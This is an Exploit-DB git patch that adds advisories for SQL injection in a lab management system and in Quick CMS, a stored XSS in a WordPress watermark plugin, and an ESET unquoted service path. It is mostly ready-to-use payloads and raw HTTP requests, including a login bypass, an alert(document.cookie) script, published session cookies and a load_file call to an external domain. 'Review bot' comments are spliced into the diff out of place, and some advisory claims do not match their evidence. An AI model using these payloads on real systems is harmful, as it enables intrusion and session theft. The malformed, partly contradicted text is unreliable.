From a06b0db78ddd1a004881470f08a3081689772628 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Thu, 4 Apr 2024 00:16:33 +0000
Subject: [PATCH] DB: 2024-04-04

6 changes to exploits/shellcodes/ghdb

Computer Laboratory Management System v1.0 - Multiple-SQLi
Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
Quick CMS v6.7 en 2023 - 'password' SQLi
Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
---
 exploits/php/webapps/51943.txt | 1 +
 exploits/php/webapps/51965.txt | 48 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/51966.txt | 28 +++++++++++++++++++
 exploits/php/webapps/51967.txt | 39 ++++++++++++++++++++++++++
 exploits/windows/local/51964.txt | 32 +++++++++++++++++++++
 files_exploits.csv | 6 +++-
 6 files changed, 153 insertions(+), 1 deletion(-)
 create mode 100644 exploits/php/webapps/51965.txt
 create mode 100644 exploits/php/webapps/51966.txt
 create mode 100644 exploits/php/webapps/51967.txt
 create mode 100644 exploits/windows/local/51964.txt

diff --git a/exploits/php/webapps/51943.txt b/exploits/php/webapps/51943.txt
index c0a3435a2..76489378c 100644
--- a/exploits/php/webapps/51943.txt
+++ b/exploits/php/webapps/51943.txt
@@ -5,6 +5,7 @@
 # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
 # Version: v1.0
 # Tested on: Windows 10
+# CVE: CVE-2024-29410
 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
 # POC:
 1. Here we go to : http://127.0.0.1/fuelflow/index.php
diff --git a/exploits/php/webapps/51965.txt b/exploits/php/webapps/51965.txt
new file mode 100644
index 000000000..d2867eb40
--- /dev/null
+++ b/exploits/php/webapps/51965.txt
@@ -0,0 +1,48 @@
+# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
+# Author: nu11secur1ty
+# Date: 03/28/2024
+# Vendor: https://github.com/oretnom23
+# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
+# Reference: https://portswigger.net/web-security/sql-injection
+
+# Description:
+The id parameter appears to be vulnerable to SQL injection attacks.
+The payload '+(select
+load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
+was submitted in the id parameter. This payload injects a SQL
+sub-query that calls MySQL's load_file function with a UNC file path
+that references a URL on an external domain. The application
+interacted with that domain, indicating that the injected SQL query
+was executed. The attacker can get all information from the system by
+using this vulnerability!
+
+STATUS: HIGH- Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
+or GROUP BY clause
+ Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
+(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: page=user/manage_user&id=7''' AND (SELECT 1734
+FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
+(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
+(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 11 columns
+ Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/51966.txt b/exploits/php/webapps/51966.txt
new file mode 100644
index 000000000..37011fbe6
--- /dev/null
+++ b/exploits/php/webapps/51966.txt
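Review bot: The description paragraph is the generic out-of-band `load_file` finding text ("The application interacted with that domain"), but none of the four payloads listed under `[+]Payload:` use `load_file`; what the hunk actually evidences is boolean-, error-, time-based and UNION injection through the `id` parameter of `page=user/manage_user`, and the text should describe that rather than a probe it does not show. The callback hostname in the quoted payload should be a placeholder, and the closing "The attacker can get all information from the system" is an assertion nothing in the hunk substantiates. `page=user/manage_user` looks like an administrative page, so the advisory should state whether an authenticated session is required — that single fact decides how a defender rates exposure. The title says "Multiple-SQLi" while one parameter on one page is demonstrated, and, unlike the 51943 header earlier in this patch, `# Tested on:` and `# CVE:` lines are absent.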
@@ -0,0 +1,28 @@
+# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
+# Date: 22 March 2024
+# Exploit Author: Erdemstar
+# Vendor: https://wordpress.com/
+# Version: 1.3.1
+
+# Proof Of Concept:
+1. Click Add New Watermark and enter the XSS payload into the Watermark Text.
+2. Stored XSS will run on anyone who wants to edit this page.
+
+# Vulnerable Property: watermark_title
+# PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp
+# Request:
+POST /wp-admin/post.php HTTP/2
+Host: erdemstar.local
+Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723
+Content-Length: 1460
+Upgrade-Insecure-Requests: 1
+Origin: https://erdemstar.local
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+
+_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px
\ No newline at end of file
diff --git a/exploits/php/webapps/51967.txt b/exploits/php/webapps/51967.txt
new file mode 100644
index 000000000..77dc1f93f
--- /dev/null
+++ b/exploits/php/webapps/51967.txt
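Review bot: The request body on the last line of the hunk is an authenticated editor action (`action=editpost`, `user_ID=5`, `post_author=5`, `_wpnonce=…`), so the finding needs a logged-in account that is allowed to create `watermark` posts, and the advisory never states that privilege level; a `# Privileges required:` header line would let a reader rate it. The `Cookie:` header publishes full `wordpress_sec_*` and `wordpress_logged_in_*` session values and the body publishes several nonces; even when taken from a lab, these should be replaced with `<REDACTED>` placeholders in a published request. `# Vendor: https://wordpress.com/` points at the hosting platform rather than the plugin's author or directory page, which is where a reader would look for a fixed release. "Stored XSS will run on anyone who wants to edit this page" could be stated precisely as: the value stored in `watermark_title` is rendered unescaped on the watermark's edit screen, so any user who opens that screen executes it.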
@@ -0,0 +1,39 @@
+# Title: Quick CMS v6.7 en 2023 - 'password' SQLi
+# Author: nu11secur1ty
+# Date: 03/19/2024
+# Vendor: https://opensolution.org/
+# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
+# Reference: https://portswigger.net/web-security/sql-injection
+
+# Description: The password parameter is vulnerable for SQLi bypass authentication!
+
+[+]Payload:
+```mysql
+POST /admin.php?p=login HTTP/1.1
+Host: localpwnedhost.com
+Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
+Content-Length: 92
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://localpwnedhost.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://localpwnedhost.com/admin.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+Connection: close
+
+sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true
+
+```
\ No newline at end of file
diff --git a/exploits/windows/local/51964.txt b/exploits/windows/local/51964.txt
new file mode 100644
index 000000000..9ac579f93
--- /dev/null
+++ b/exploits/windows/local/51964.txt
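Review bot: The PoC stops at the login request and never shows the response, so the hunk does not let a reader confirm what "bypass authentication" produced (a redirect into the admin panel, a session being issued, an error page); a one-line `# Response:` summary of what was observed would make the finding verifiable. The title and the CSV row name the parameter 'password' while the form field actually sent is `sPass`, so the two should be aligned. The request is fenced as a `mysql` code block although it is an HTTP request, and `Cookie: PHPSESSID=...` should be a placeholder such as `<SESSION>`. As in 51965 from the same patch, `# Tested on:` and a vendor-notification or fixed-version line are absent.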
@@ -0,0 +1,32 @@
+# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Exploit Date: 2024-04-01
+# Vendor : https://www.eset.com
+# Version : 17.0.16.0
+# Tested on OS: Microsoft Windows 10 pro x64
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
+Security\ekrn.exe
+
+C:\>sc qc ekrn
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ekrn
+ TYPE : 20 WIN32_SHARE_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"
+ LOAD_ORDER_GROUP : Base
+ TAG : 0
+ DISPLAY_NAME : ESET Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+OS Name: Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 12be7ed11..3dddf301f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
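Review bot: The evidence in this hunk does not support the title: `sc qc ekrn` reports `BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"` with the path quoted, which is exactly the condition the `findstr /i /v """` stage of the wmic pipeline is meant to exclude, so the one service that is actually confirmed has no unquoted path. The wmic row above it appears to name a different service (`ESET Updater` / `ESETServiceSvc`, under `Program Files (x86)`) from the one queried, so either the `sc qc` should be run against the service the filter returned, or the finding should be withdrawn as a false positive; as written, an unquoted path is never shown. The same author's earlier entry 51351 ("ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path", visible in the files_exploits.csv hunk further down) covers the same `ekrn` service, and the new entry should say what is different. A defender triaging this should read the configured ImagePath of the named service and accept the finding only if that value is genuinely unquoted and contains spaces.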
@@ -16242,6 +16242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info
 33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info
 30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",webapps,php,,2007-11-07,2014-01-06,1,CVE-2007-5923;OSVDB-40269,,,,,https://www.securityfocus.com/bid/26375/info
+51965,exploits/php/webapps/51965.txt,"Computer Laboratory Management System v1.0 - Multiple-SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 32598,exploits/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,webapps,php,,2008-11-24,2014-03-31,1,OSVDB-50170,,,,,https://www.securityfocus.com/bid/32459/info
 29907,exploits/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2287;OSVDB-34168,,,,,https://www.securityfocus.com/bid/23661/info
 3152,exploits/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,webapps,php,,2007-01-17,2016-09-21,1,OSVDB-34621;CVE-2007-0395,,,,http://www.exploit-db.comcomvironment_4.0frc3.tar.gz,
@@ -25846,7 +25847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php,,2017-03-11,2017-03-11,0,,,,,,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Mr.Gedik,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
 38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php,,2013-03-14,2015-10-03,1,,,,,,https://www.securityfocus.com/bid/58508/info
-51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
+51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-03,0,CVE-2024-29410,,,,,
 51032,exploits/php/webapps/51032.py,"pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)",2023-02-20,IHTeam,webapps,php,,2023-02-20,2023-02-20,0,CVE-2022-31814,,,,,
 6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48109;CVE-2008-4355,,,,,
 23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php,,2013-01-05,2013-04-15,1,OSVDB-88930;OSVDB-88929;OSVDB-88928,,,http://www.exploit-db.com/screenshots/idlt24000/screenshot.png,,
@@ -28653,6 +28654,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info
 31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info
 32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info
+51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip,
 10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,,
 7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,,
@@ -32880,6 +32882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37902,exploits/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",webapps,php,,2012-10-01,2015-08-21,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/55749/info
 30036,exploits/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",webapps,php,,2007-05-14,2017-11-22,1,CVE-2007-2714;OSVDB-37290,"WordPress Plugin",,,,https://www.securityfocus.com/bid/23965/info
 37464,exploits/php/webapps/37464.txt,"WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",webapps,php,80,2015-07-02,2015-07-02,0,OSVDB-124060;OSVDB-124058;OSVDB-124057;OSVDB-124056;OSVDB-124055;OSVDB-124054;OSVDB-124053,,,,http://www.exploit-db.comalbo-pretorio-on-line.3.2.zip,
+51966,exploits/php/webapps/51966.txt,"Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)",2024-04-03,Erdemstar,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 36323,exploits/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,webapps,php,,2011-11-21,2015-03-11,1,CVE-2011-5107;OSVDB-77475,"WordPress Plugin",,,,https://www.securityfocus.com/bid/50743/info
 45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80,2018-07-19,2018-07-20,0,CVE-2018-13832,"Cross-Site Scripting (XSS)",,,,
 40082,exploits/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",webapps,php,80,2016-07-11,2016-07-11,0,,,,,http://www.exploit-db.comall-in-one-seo-pack.2.3.6.1.zip,
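Review bot: The added row spells the product prefix `Wordpress Plugin` while every neighbouring row uses `WordPress Plugin`, and it leaves the tags column empty where those rows carry `"WordPress Plugin"`; since this file is the search index, the new entry will not sort or filter alongside the other WordPress plugin advisories. Suggest `"WordPress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)"` for the description and `"WordPress Plugin"` in the tags column, with the `# Exploit Title:` line of the 51966 hunk above changed to match so the index and the file stay consistent.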
@@ -40185,6 +40188,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,,
 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/
 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/
+51964,exploits/windows/local/51964.txt,"ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path",2024-04-03,"Milad karimi",local,windows,,2024-04-03,2024-04-03,0,,,,,,
 51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,,
 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,,
 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,,